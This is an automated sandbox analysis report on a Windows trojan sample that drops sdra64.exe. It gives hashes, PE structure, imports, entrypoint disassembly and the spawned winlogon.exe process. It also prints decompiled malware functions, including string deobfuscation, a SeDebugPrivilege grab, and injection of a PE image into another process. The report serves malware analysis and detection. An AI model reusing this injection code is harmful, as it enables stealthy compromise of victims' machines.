  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\SysWOW64\sdra64.exe
Process:C:\Users\user\Desktop\P8jE8nmN7G.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):960512
Entropy (8bit):7.4471687140914185
Encrypted:false
SSDEEP:24576:+Vy+qcRpdmAA4xiaUG5al4+0JgF8VDn50JTJtFW1a7wt:V+tTmIzD4O+4gF+5Qjka7+
MD5:8834EA3D0BD0092967199887FAA44929
SHA1:411441B2883B67FECDC085B6E5F7E7F51D68AA90
SHA-256:2C3A335C1B7760346149BEC5BE904E9DD6289E18C81A5264E5C8C073D58DDE03
SHA-512:42E28B003961CC94D9F26AE5C347AD972A45283B4213123F818BC4F76829E54BC33C22ACD92BEBA3EE4A22E5FFC82163F9FBB4E82BA9DB6E68C051DB840D6CDE
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........".R.C...C...C..Zg2..C..4...C..N.F..C...)0..C..|...GC..Rich.C..................................................................PE..L....G0G................. ...v......Tt.......0....@..........................................................................5..x....................................................................................0...............................text............ .................. ..`.rdata..@#...0...$...$..............@..@.data...}P...`.......H..............@...........................................................................................................................................................................................................................................................................................................................................................................................
C:\Windows\SysWOW64\sdra64.exe:Zone.Identifier
Process:C:\Users\user\Desktop\P8jE8nmN7G.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.463091044475583
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.83%
  • Windows Screen Saver (13104/52) 0.13%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:P8jE8nmN7G.exe
File size:602112
MD5:ac514dce9416eb9e4148431016629174
SHA1:b0e1d96605cdc3da995a667a1fdc7189b67bfdcd
SHA256:67334c1b7f629c04efefbfb466e5996a425af4a43c07a5ce51d4f142222b0de7
SHA512:8c485630cae11e23c5eb790aa061681fe161ea390e07731ea7742a9f029806f43eb432eb08af280b301e889a6b4932ae6c6b436b8d78afb333e5cf0ba8e8907a
SSDEEP:12288:+VZuL+Kd3LSbFPFX3PL2w5+9naFA4xixYUSl5alHY+0JgKsOaRC:+Vy+qcRpdmAA4xiaUG5al4+0JgFU
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........".R.C...C...C..Zg2..C..4....C..N.F..C...)0..C..|...GC..Rich.C.................................................................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x407454
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x4730479C [Tue Nov 6 10:53:16 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:fbbf51b163121df5cf4fc9419aafa3af

Entrypoint Preview

Instruction
call 00007FE68087D0EBh
xor edi, edi
pop esi
retn 0028h
xor esi, esi
push 0000000Eh
push 00681494h
push 00FFFE7Ch
push 00000001h
push 00AAC0FBh
push 00000000h
call dword ptr [004130FCh]
mov edx, eax
or edx, 000000BEh
add esi, edx
push edx
push 00000000h
call dword ptr [00413100h]
pop ebx
cmp esi, 08407BE0h
jnl 00007FE68087D0E4h
jmp 00007FE68087D0A9h
mov eax, 0001362Fh
add eax, 5Bh
mov ecx, edx
sub esp, 04h
mov dword ptr [esp], ecx
sub esp, 04h
mov dword ptr [esp], 00000040h
sub esp, 04h
mov dword ptr [esp], 00003000h
push eax
sub esp, 04h
mov dword ptr [esp], 00000000h
call dword ptr [004130F8h]
pop ecx
mov ecx, esi
mov esi, dword ptr [esp]
mov edi, eax
add esi, 000000F3h
push eax
mov ecx, 000001E6h
mov edx, 137D02D9h
mov ebp, 00000000h
mov bh, dl
add bh, byte ptr [esi]
add esi, 01h
mov byte ptr [edi], bh
add byte ptr [edi], bl
add edi, 01h
sub esp, 04h
mov dword ptr [esp], edx
sub esp, 04h
mov dword ptr [esp], ecx
push 0000001Dh
push 0000001Eh
push 00FFFC60h
push 00000005h
push 006D2D0Ch
push 00000000h
call dword ptr [000000FCh]

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x135c8          0x78          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x13000          0x4e0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x1000           0x11f89       0x12000   False     0.879055447049   data       7.22037238545   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x13000          0x2340        0x2400    False     0.452256944444   data       5.58339650142   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x16000          0x507d        0x200     False     0.13671875       data       0.819758377798  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL:Imports
KERNEL32.dll:FatalAppExitW, WriteTapemark, CreatePipe, FindClose, GetWindowsDirectoryA, FatalAppExitA, TerminateProcess, ReadConsoleW, MoveFileExW, GetPrivateProfileSectionW, CreateProcessA, DebugBreak, VerLanguageNameA, WaitForSingleObject, ReleaseMutex, OpenWaitableTimerW, GetQueuedCompletionStatus, LocalSize, lstrcpyn, GetProcAddress, GetLogicalDriveStringsA, FlushViewOfFile, GetCurrentProcess, BackupSeek, SystemTimeToTzSpecificLocalTime, SetConsoleCP, InitAtomTable, HeapCompact, WriteProfileStringA, FindNextFileW, GetDateFormatA, GetNumberFormatA, CommConfigDialogA, RemoveDirectoryA, ReadConsoleOutputCharacterA, IsBadCodePtr, GetFileAttributesA, GetProcessPriorityBoost, WriteFileEx, ConvertDefaultLocale, IsBadReadPtr, CreateSemaphoreA, Toolhelp32ReadProcessMemory, SetThreadPriority, SuspendThread, GetProcessAffinityMask, CreateMailslotW, VirtualProtect, SetConsoleTitleA, GetCurrentThread, VirtualProtectEx, ReadConsoleOutputA, EnumCalendarInfoExA, FindFirstChangeNotificationA, lstrcpyW, GetFileInformationByHandle, DebugActiveProcess, DisableThreadLibraryCalls, SetLocaleInfoA, OpenEventW, FreeLibraryAndExitThread, EnumSystemCodePagesA, VirtualAlloc, MapViewOfFileEx, GetFileType
ole32.dll:GetHookInterface, CoRevertToSelf, OleDraw, OleBuildVersion, OleCreateFromFile, StgCreateDocfileOnILockBytes, OpenOrCreateStream, OleCreateFromData, CreateAntiMoniker, GetHGlobalFromStream, OleSetMenuDescriptor, ReleaseStgMedium, ReadStringStream, CoFileTimeToDosDateTime, OleCreateEmbeddingHelper, RegisterDragDrop, GetHGlobalFromILockBytes, OleConvertIStorageToOLESTREAM, DllDebugObjectRPCHook, UtGetDvtd16Info, OleMetafilePictFromIconAndLabel, CoRevokeClassObject, ReadOleStg, CoRegisterMessageFilter, CreateGenericComposite, CreateStreamOnHGlobal, IsEqualGUID, OleRegEnumFormatEtc, CoFreeLibrary, CoGetTreatAsClass, OleSave, StgOpenAsyncDocfileOnIFillLockBytes, CoCopyProxy, CoIsOle1Class, CoBuildVersion, CoGetCurrentLogicalThreadId, CoReleaseMarshalData, CoQueryAuthenticationServices, OleConvertOLESTREAMToIStorageEx, CreateClassMoniker, CoImpersonateClient, StgOpenStorageEx, CoRevokeMallocSpy, OleCreate, CoUnmarshalInterface, CoGetCurrentProcess, CreateDataCache, StringFromGUID2, CoTreatAsClass, StgOpenStorage, OleCreateLinkFromData, OleGetIconOfFile, OleTranslateAccelerator, CreateDataAdviseHolder, OleCreateLinkEx, CoGetCallerTID, CoTaskMemRealloc, UtConvertDvtd32toDvtd16
ADVAPI32.dll:CryptEnumProvidersW, CryptSetProviderA, QueryServiceObjectSecurity, LookupPrivilegeValueA, CryptEnumProviderTypesA, LookupSecurityDescriptorPartsW, GetLengthSid, CopySid, BuildSecurityDescriptorW, SetSecurityDescriptorDacl, RegQueryValueW, BuildTrusteeWithSidW, SetEntriesInAuditListA, BuildTrusteeWithNameW, CryptSetProvParam, RegReplaceKeyA, OpenBackupEventLogA, RegSaveKeyA, RegisterEventSourceW, UnlockServiceDatabase, LookupAccountNameA, CloseServiceHandle, GetSidSubAuthorityCount, CryptAcquireContextW, SetServiceStatus, OpenThreadToken, CryptGetDefaultProviderW, RegEnumKeyExW, AreAnyAccessesGranted, GetOldestEventLogRecord, CryptSetHashParam, CryptContextAddRef, StartServiceW, RegSetValueExA, ReadEventLogW, GetCurrentHwProfileW, GetSecurityDescriptorGroup, GetMultipleTrusteeOperationA, CryptGenRandom, ChangeServiceConfigA, SetNamedSecurityInfoExA, GetAccessPermissionsForObjectW, AddAuditAccessAce, GetOverlappedAccessResults, RegCreateKeyW, SetSecurityDescriptorSacl, LookupAccountSidA, ReportEventA, CryptSignHashW, RegQueryMultipleValuesW, DeregisterEventSource, CancelOverlappedAccess, RegQueryValueExW, OpenBackupEventLogW, BackupEventLogW, CryptDecrypt, AccessCheckAndAuditAlarmA, CreateProcessAsUserA, InitializeSecurityDescriptor, RegEnumKeyA, SetTokenInformation, AddAccessDeniedAce, RegCreateKeyExA, GetTokenInformation, IsValidAcl, RegCreateKeyExW, LookupPrivilegeNameW
SHLWAPI.dll:PathMakePrettyA, SHEnumKeyExW, PathCompactPathExA, SHDeleteKeyA, UrlEscapeA, SHCreateStreamOnFileW, PathIsUNCServerA, PathFindExtensionA, SHRegDeleteUSValueA, PathFindSuffixArrayW, PathIsUNCServerW, SHRegGetUSValueW, StrCmpNA, SHRegEnumUSValueA, StrStrIA, SHSetValueW, SHOpenRegStream2A, PathIsNetworkPathA, StrCpyNW, StrRChrIW, PathSkipRootA, UrlHashA, SHRegDeleteEmptyUSKeyW, PathGetArgsA, StrRetToBufA, SHRegOpenUSKeyA, StrCatBuffW, PathRemoveArgsA, ChrCmpIA, PathBuildRootA, SHRegDeleteUSValueW, PathCompactPathA, PathIsRootW, PathSearchAndQualifyW, wnsprintfW, StrToIntW, SHQueryInfoKeyA, PathAddBackslashW, StrCmpNW, UrlUnescapeA, StrCSpnIA, SHStrDupW, PathRemoveFileSpecW, StrFormatKBSizeA, SHSetThreadRef, StrCSpnA, SHRegDuplicateHKey, UrlCanonicalizeA, UrlIsOpaqueW, SHQueryValueExA, PathCommonPrefixA, StrChrW, SHRegSetUSValueW, PathRemoveExtensionA, wvnsprintfA, PathIsDirectoryA, SHEnumValueW, StrRetToStrA, UrlEscapeW, StrCSpnIW, UrlIsW, PathStripToRootA
USER32.dll:IsRectEmpty, GetSubMenu, DialogBoxParamW, ReleaseCapture, ExitWindowsEx, LoadCursorW, EndDialog, MessageBoxIndirectW, GetMenuState, TranslateMessage, SetLastErrorEx, CreateDialogParamA, GetTabbedTextExtentW, SetDlgItemTextA, GetMenuInfo, CharLowerBuffW, DdeConnect, EnumThreadWindows, UnregisterClassA, ChangeDisplaySettingsExW, TrackPopupMenuEx, SetCursorPos, GetMenuItemRect, GetCaretBlinkTime, IsMenu, GetThreadDesktop, SetPropA, GetClipboardOwner, EnumPropsExW, GetClipboardFormatNameA, DrawEdge, GetMenuCheckMarkDimensions, IsChild, DrawStateW, GetAncestor, FillRect, DlgDirListComboBoxW, WinHelpA, EnumClipboardFormats, SetPropW, EnumDisplayMonitors, GetWindowInfo, EnumDisplaySettingsA, CharUpperW, LookupIconIdFromDirectoryEx, GetQueueStatus, GetMessageTime, GetKeyboardState, DdeAddData, SendMessageTimeoutA, EnumDesktopsA, SetWindowPos, InvalidateRect, SetMessageExtraInfo, SetClipboardData

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage


Memory Usage


High Level Behavior Distribution


Behavior


System Behavior

General

Start time:20:35:59
Start date:09/05/2021
Path:C:\Users\user\Desktop\P8jE8nmN7G.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\P8jE8nmN7G.exe'
Imagebase:0x400000
File size:602112 bytes
MD5 hash:AC514DCE9416EB9E4148431016629174
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:20:36:00
Start date:09/05/2021
Path:C:\Windows\System32\winlogon.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff739090000
File size:677376 bytes
MD5 hash:F9017F2DC455AD373DF036F5817A8870
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis


    Executed Functions

    C-Code - Quality: 91%
    			E0040B585() {
    				signed int _v5;
    				long _v12;
    				short _v532;
    				void* __ebx;
    				void* _t34;
    				intOrPtr _t35;
    				void* _t36;
    				intOrPtr _t39;
    				char _t44;
    				intOrPtr _t46;
    				long _t47;
    				void* _t49;
    				int _t51;
    				int _t54;
    				char* _t58;
    				void* _t59;
    				int _t60;
    				intOrPtr _t64;
    				intOrPtr _t66;
    				signed int _t67;
    				char _t71;
    				signed char* _t76;
    				intOrPtr _t77;
    				intOrPtr _t79;
    				void* _t80;
    				signed int _t81;
    				char* _t84;
    				int _t86;
    				void* _t87;
    				signed int _t90;
    				void* _t92;
    
    				 *0x416cd0 =  *0x416cd0 & 0x00000000;
    				_t34 = E0040AACA();
    				if(_t34 != 0) {
    					 *0x416bbc =  *0x416bbc | 0xffffffff;
    					_t35 = E0040BA0A(E0040B4E1);
    					_t71 = 0;
    					 *0x416d84 = _t35; // executed
    					_t36 = HeapCreate(0, 0x80000, 0); // executed
    					 *0x418074 = _t36;
    					__eflags = _t36;
    					if(_t36 != 0) {
    						 *0x416797 = 1;
    					} else {
    						 *0x418074 = GetProcessHeap();
    						 *0x416797 = 0;
    					}
    					E00414AEA();
    					 *0x417074 = _t71;
    					 *0x4167be = _t71;
    					_t39 = E0040F0A8(0x184);
    					 *0x416c34 = _t39;
    					__eflags = _t39 - _t71;
    					if(_t39 != _t71) {
    						_v12 = _t71;
    						while(1) {
    							_t90 = (_v12 & 0x0000ffff) << 2;
    							_t84 = E0040F0A8(( *( *(_t90 + 0x416020)) & 0x000000ff) + 1);
    							__eflags = _t84 - _t71;
    							if(_t84 == _t71) {
    								break;
    							}
    							_t76 =  *(_t90 + 0x416020);
    							__eflags =  *_t76 - _t71;
    							_v5 = _t71;
    							if( *_t76 > _t71) {
    								_t67 = 0;
    								__eflags = 0;
    								_t80 = 0xba;
    								do {
    									_v5 = _v5 + 1;
    									 *((char*)(_t67 + _t84)) = ( &(_t76[1]))[_t67] + _t80;
    									_t67 = _v5 & 0x000000ff;
    									_t80 = _t80 + 2;
    									__eflags = _t67 -  *_t76;
    								} while (_t67 <  *_t76);
    								_t71 = 0;
    								__eflags = 0;
    							}
    							 *((char*)((_v5 & 0x000000ff) + _t84)) = _t71;
    							__eflags =  *_t84 - 0x57;
    							if( *_t84 != 0x57) {
    								_t46 =  *0x416c34; // 0x25df5a8
    								_t86 = _t84 + 1;
    								__eflags = _t86;
    								 *(_t90 + _t46) = _t86;
    								goto L17;
    							} else {
    								_t15 = _t84 + 1; // 0x1
    								_t64 = E0040F4DC(( *( *(_t90 + 0x416020)) & 0x000000ff) - 1, _t15);
    								_t79 =  *0x416c34; // 0x25df5a8
    								 *((intOrPtr*)(_t90 + _t79)) = _t64;
    								E0040F0C0(_t84);
    								_t66 =  *0x416c34; // 0x25df5a8
    								__eflags =  *((intOrPtr*)(_t90 + _t66)) - _t71;
    								if( *((intOrPtr*)(_t90 + _t66)) != _t71) {
    									L17:
    									_v12 = _v12 + 1;
    									__eflags = _v12 - 0x61;
    									if(_v12 < 0x61) {
    										continue;
    									} else {
    										_t47 = GetCurrentProcessId();
    										_t77 =  *0x416d84; // 0x400000
    										 *0x416d78 = _t47;
    										_t22 = _t77 + 0x3c; // 0x100
    										_t49 =  *_t22 + _t77;
    										_t81 =  *(_t49 + 6) & 0x0000ffff;
    										_t92 = 0;
    										__eflags = _t81 - _t71;
    										if(_t81 > _t71) {
    											_t87 = 3;
    											__eflags = _t87 - _t81;
    											if(_t87 < _t81) {
    												_t59 = ( *(_t49 + 0x14) & 0x0000ffff) + _t49 + 0x90;
    												_t92 =  *((intOrPtr*)(_t59 + 0xc)) + _t77;
    												_t60 = IsBadHugeReadPtr(_t92,  *(_t59 + 8));
    												__eflags = _t60;
    												if(_t60 != 0) {
    													_t92 = 0;
    													__eflags = 0;
    												}
    											}
    										}
    										 *0x416c64 = _t92;
    										 *0x416c50 =  *0x416eac(); // executed
    										_t51 = E0041158D(L"SeDebugPrivilege"); // executed
    										__eflags = _t51;
    										if(_t51 == 0) {
    											 *0x416cd0 =  *0x416cd0 | 0x00000001;
    											__eflags =  *0x416cd0;
    										}
    										_v12 = 0x103;
    										_t54 = GetUserNameW( &_v532,  &_v12); // executed
    										__eflags = _t54;
    										if(__eflags == 0) {
    											L26:
    											 *0x416bb0 = "-";
    										} else {
    											_t58 = E0040F113(__eflags,  &_v532, _v12 + _v12);
    											 *0x416bb0 = _t58;
    											__eflags = _t58 - _t71;
    											if(_t58 == _t71) {
    												goto L26;
    											}
    										}
    										_t44 = 1;
    									}
    								} else {
    									break;
    								}
    							}
    							L28:
    							goto L29;
    						}
    						_t44 = 0;
    						goto L28;
    					} else {
    						_t44 = 0;
    					}
    					L29:
    					return _t44;
    				} else {
    					return _t34;
    				}
    			}

    0x0040b588
    0x0040b595
    0x0040b59c
    0x0040b5a0
    0x0040b5ad
    0x0040b5b2
    0x0040b5bb
    0x0040b5c0
    0x0040b5c6
    0x0040b5cb
    0x0040b5cd
    0x0040b5e2
    0x0040b5cf
    0x0040b5d5
    0x0040b5da
    0x0040b5da
    0x0040b5e9
    0x0040b5f3
    0x0040b5f9
    0x0040b5ff
    0x0040b604
    0x0040b609
    0x0040b60b
    0x0040b615
    0x0040b619
    0x0040b61d
    0x0040b62f
    0x0040b631
    0x0040b633
    0x00000000
    0x00000000
    0x0040b635
    0x0040b63b
    0x0040b63d
    0x0040b640
    0x0040b642
    0x0040b642
    0x0040b644
    0x0040b646
    0x0040b64c
    0x0040b64f
    0x0040b652
    0x0040b659
    0x0040b65c
    0x0040b65c
    0x0040b660
    0x0040b660
    0x0040b660
    0x0040b666
    0x0040b669
    0x0040b66c
    0x0040b6a1
    0x0040b6a6
    0x0040b6a6
    0x0040b6a7
    0x00000000
    0x0040b66e
    0x0040b677
    0x0040b67c
    0x0040b681
    0x0040b688
    0x0040b68b
    0x0040b690
    0x0040b695
    0x0040b698
    0x0040b6aa
    0x0040b6aa
    0x0040b6ad
    0x0040b6b2
    0x00000000
    0x0040b6b8
    0x0040b6b8
    0x0040b6be
    0x0040b6c4
    0x0040b6c9
    0x0040b6cc
    0x0040b6ce
    0x0040b6d2
    0x0040b6d4
    0x0040b6d7
    0x0040b6db
    0x0040b6dc
    0x0040b6df
    0x0040b6e5
    0x0040b6f2
    0x0040b6f5
    0x0040b6fb
    0x0040b6fd
    0x0040b6ff
    0x0040b6ff
    0x0040b6ff
    0x0040b6fd
    0x0040b6df
    0x0040b701
    0x0040b712
    0x0040b718
    0x0040b71d
    0x0040b71f
    0x0040b721
    0x0040b721
    0x0040b721
    0x0040b733
    0x0040b73a
    0x0040b740
    0x0040b742
    0x0040b75f
    0x0040b75f
    0x0040b744
    0x0040b751
    0x0040b756
    0x0040b75b
    0x0040b75d
    0x00000000
    0x00000000
    0x0040b75d
    0x0040b769
    0x0040b769
    0x00000000
    0x00000000
    0x00000000
    0x0040b698
    0x0040b76b
    0x00000000
    0x0040b76c
    0x0040b69a
    0x00000000
    0x0040b60d
    0x0040b60d
    0x0040b60d
    0x0040b76d
    0x0040b76f
    0x0040b59f
    0x0040b59f
    0x0040b59f

    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 0040B5C0
    • GetProcessHeap.KERNEL32 ref: 0040B5CF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Heap$CreateProcess
    • String ID: SeDebugPrivilege$a
    • API String ID: 1042935442-2150345230
    • Opcode ID: 9d7066090ffd46d9644d699337f011465e48944d7f28e4f2d1c34608c64d3911
    • Instruction ID: 1f6895ae0b60d46ef224a9e176b8ad6c2e485857426bfcc3600c922ed2c5ce47
    • Opcode Fuzzy Hash: 9d7066090ffd46d9644d699337f011465e48944d7f28e4f2d1c34608c64d3911
    • Instruction Fuzzy Hash: 6C5104305042549ECB209F75E8856EABFE8EF05308F0684BEE441E72A2D779D945CB9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004070D3(void* _a4) {
    				void* _v8;
    				signed int _v12;
    				long _v16;
    				intOrPtr _v20;
    				void* _v24;
    				void* _t61;
    				intOrPtr _t63;
    				intOrPtr _t66;
    				void* _t67;
    				void* _t77;
    				long _t81;
    				intOrPtr* _t84;
    				void* _t85;
    				void* _t86;
    				void* _t87;
    				void* _t91;
    				intOrPtr _t93;
    				unsigned int _t95;
    				signed int _t97;
    				void* _t103;
    				long _t105;
    				void* _t106;
    				long* _t107;
    				void* _t109;
    				void* _t111;
    
    				_t86 =  *0x416d84; // 0x400000
    				_t1 = _t86 + 0x3c; // 0x100
    				_t111 =  *_t1 + _t86;
    				_v24 = _t86;
    				_t61 = VirtualAllocEx(_a4,  *(_t111 + 0x34),  *(_t111 + 0x50), 0x2000, 1); // executed
    				_v8 = _t61;
    				if(_t61 != 0) {
    					L3:
    					_t63 = E0040F0A8( *(_t111 + 0x50));
    					_v20 = _t63;
    					if(_t63 == 0) {
    						L2:
    						return 0;
    					}
    					E0040F0FC(_t63, _t86,  *(_t111 + 0x50));
    					_t66 =  *((intOrPtr*)(_t111 + 0xa0));
    					if(_t66 == 0 ||  *((intOrPtr*)(_t111 + 0xa4)) == 0) {
    						L15:
    						_t105 =  *(_t111 + 0x54);
    						_t67 = VirtualAllocEx(_a4, _v8, _t105, 0x1000, 4); // executed
    						if(_t67 == 0) {
    							goto L2;
    						}
    						WriteProcessMemory(_a4, _v8, _t86, _t105, 0); // executed
    						VirtualProtectEx(_a4, _v8, _t105, 2,  &_v16); // executed
    						_v12 = _v12 & 0x00000000;
    						_t106 = ( *(_t111 + 0x14) & 0x0000ffff) + _t111 + 0x18;
    						if(0 >=  *(_t111 + 6)) {
    							L20:
    							E0040F0C0(_v20);
    							return _v8;
    						}
    						_t107 = _t106 + 8;
    						while(1) {
    							_t77 = VirtualAllocEx(_a4, _v8 + _t107[1],  *_t107, 0x1000, 4); // executed
    							_t87 = _t77;
    							if(_t87 == 0) {
    								goto L2;
    							}
    							WriteProcessMemory(_a4, _t87, _t107[1] + _v20,  *_t107, 0); // executed
    							_t81 = 0x40;
    							_v16 = _t81;
    							VirtualProtectEx(_a4, _t87,  *_t107, _t81,  &_v16); // executed
    							_t107 =  &(_t107[0xa]);
    							_v12 = _v12 + 1;
    							if(_v12 < ( *(_t111 + 6) & 0x0000ffff)) {
    								continue;
    							}
    							goto L20;
    						}
    						goto L2;
    					} else {
    						_t91 =  *(_t111 + 0x34);
    						_t103 = _v8 - _t91;
    						_t109 = _t86 - _t91;
    						_t84 = _t66 + _v20;
    						while( *_t84 != 0) {
    							_t93 =  *((intOrPtr*)(_t84 + 4));
    							if(_t93 < 8) {
    								L13:
    								_t84 = _t84 +  *((intOrPtr*)(_t84 + 4));
    								continue;
    							}
    							_t95 = _t93 + 0xfffffff8 >> 1;
    							_v16 = _t95;
    							_v12 = 0;
    							if(_t95 == 0) {
    								goto L13;
    							} else {
    								goto L9;
    							}
    							do {
    								L9:
    								_t97 =  *(_t84 + 8 + _v12 * 2) & 0x0000ffff;
    								if(_t97 != 0) {
    									 *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) =  *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) + _t103 - _t109;
    								}
    								_v12 = _v12 + 1;
    							} while (_v12 < _v16);
    							_t86 = _v24;
    							goto L13;
    						}
    						goto L15;
    					}
    				}
    				_t85 = VirtualAllocEx(_a4, _t61,  *(_t111 + 0x50), 0x2000, 1); // executed
    				_v8 = _t85;
    				if(_t85 != 0) {
    					goto L3;
    				}
    				goto L2;
    			}

    0x004070da
    0x004070e1
    0x004070ed
    0x004070f2
    0x004070fb
    0x00407101
    0x00407106
    0x00407126
    0x00407129
    0x0040712e
    0x00407133
    0x0040711f
    0x00000000
    0x0040711f
    0x0040713a
    0x0040713f
    0x00407147
    0x004071b2
    0x004071b2
    0x004071c3
    0x004071cb
    0x00000000
    0x00000000
    0x004071db
    0x004071ee
    0x004071f8
    0x004071fc
    0x00407206
    0x00407269
    0x0040726c
    0x00000000
    0x00407271
    0x00407208
    0x0040720b
    0x0040721e
    0x00407224
    0x00407228
    0x00000000
    0x00000000
    0x0040723d
    0x00407245
    0x0040724b
    0x00407254
    0x0040725e
    0x00407261
    0x00407267
    0x00000000
    0x00000000
    0x00000000
    0x00407267
    0x00000000
    0x00407152
    0x00407152
    0x0040715a
    0x0040715c
    0x00407161
    0x004071ad
    0x00407165
    0x0040716b
    0x004071aa
    0x004071aa
    0x00000000
    0x004071aa
    0x00407170
    0x00407172
    0x00407175
    0x0040717c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040717e
    0x0040717e
    0x00407181
    0x00407189
    0x0040719a
    0x0040719a
    0x0040719c
    0x004071a2
    0x004071a7
    0x00000000
    0x004071a7
    0x00000000
    0x004071ad
    0x00407147
    0x00407112
    0x00407118
    0x0040711d
    0x00000000
    0x00000000
    0x00000000

    APIs
    • VirtualAllocEx.KERNELBASE(?,?,?,00002000,00000001,00000000,00000000,00000000,?,?,025DF908), ref: 004070FB
    • VirtualAllocEx.KERNELBASE(?,00000000,?,00002000,00000001,?,025DF908), ref: 00407112
    • VirtualAllocEx.KERNELBASE(?,?,?,00001000,00000004,00000000,00400000,?,?,025DF908), ref: 004071C3
    • WriteProcessMemory.KERNELBASE(?,?,00400000,?,00000000,?,025DF908), ref: 004071DB
    • VirtualProtectEx.KERNELBASE(?,?,?,00000002,025DF908,?,025DF908), ref: 004071EE
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00001000,00000004,?,025DF908), ref: 0040721E
    • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000,?,025DF908), ref: 0040723D
    • VirtualProtectEx.KERNELBASE(00000000,00000000,?,00000040,025DF908,?,025DF908), ref: 00407254
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Virtual$Alloc$MemoryProcessProtectWrite
    • String ID:
    • API String ID: 426431698-0
    • Opcode ID: a297a517308540ba8c430f5fd71bf4452da91147fb2fa7cddaf9f8209f59f5e7
    • Instruction ID: dd38471a4f7e68d7683add05fd9e9a4a04c2e990e53906189e99ae61c3131440
    • Opcode Fuzzy Hash: a297a517308540ba8c430f5fd71bf4452da91147fb2fa7cddaf9f8209f59f5e7
    • Instruction Fuzzy Hash: 46519C71A00209EFDB218F94CC84FAEBBB6FF44344F148429F506AA2E1D775AD51DB18
    Uniqueness

    Uniqueness Score: -1.00%
